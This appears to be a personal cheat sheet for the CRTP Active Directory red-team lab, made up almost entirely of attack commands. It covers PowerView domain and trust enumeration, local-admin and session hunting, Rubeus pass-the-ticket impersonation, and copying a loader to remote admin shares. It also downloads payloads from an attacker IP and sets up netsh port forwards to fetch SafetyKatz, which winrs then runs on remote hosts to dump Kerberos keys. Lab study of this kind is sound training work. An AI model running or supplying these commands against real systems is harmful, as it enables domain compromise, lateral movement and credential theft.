CRTP

Domain Enumeration

Basic

# Users
Get-DomainUser | select samaccountname
# Computers
Get-DomainComputer | select cn
# DAs
Get-DomainGroupMember -identity "Domain Admins" | select membername
# EAs
Get-DomainGroupMember -identity "Enterprise Admins" -domain <domain> | select membername

# Collect BH data
 \bh_collectors\SharpHound.exe -c all --zipfilename crtp_data --outputdirectory .\bh_collectors\

Shares

# Create a host list
Get-DomainComputer | ForEach-Object { $_.cn.Trim() } > servers.txt
# Enumerate shares
Invoke-HuntSMBShares -NonPing -OutputDirectory .\ -HostList servers.txt

Trusts

# Forest domains
Get-ForestDomain | select name
# Domain trusts
Get-DomainTrust
# External trusts
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
# External trusts (forest root)
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "Filter_Sids"}
# Trusts for all domains in the specified forest
Get-ForestDomain -forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}
Get-DomainTrust -domain eurocorp.local

Privilege Escalation

LA

# Enumerate LA access on domain hosts
Find-PSRemotingLocalAdminAccess

Sessions

# Create a host list
Get-DomainComputer | ForEach-Object { $_.cn.Trim() } > servers.txt
# List active sessions (no elevated privileges are required on the remote hosts)
Invoke-SessionHunter -NoPortScan -RawResults -Targets .\servers.txt | select Hostname,UserSession,Access

Impersonation

# Launch a new process as the specified user
Loader.exe -path Rubeus.exe -args asktgt /user:<user> /aes256:<key> /opsec /createnetonly:c:\windows\system32\cmd.exe /show /ptt

Persistence

First Tab

Second Tab

Misc

Transfers

# Copy a file to a share
echo F | xcopy Loader.exe \\dcorp-?\c$\users\public\Loader.exe
# Download a file
iwr 'http://172.16.100.37/Loader.exe' -OutFile c:\users\public\loader.exe

Port Forward

Directly:

# Connect to the target host
winrs -r:<target> cmd

# Create a port forward
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0. connectport=80 connectaddress=172.16.100.37

# Run binary
c:\users\public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe "sekurlsa::evasive-keys" "exit"

Via WinRS:

# Create a port forward via winrs
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0. connectport=80 connectaddress=172.16.100.37"

# Run binary via winrs
$null | winrs -r:dcorp-mgmt "cmd /c c:\users\public\loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"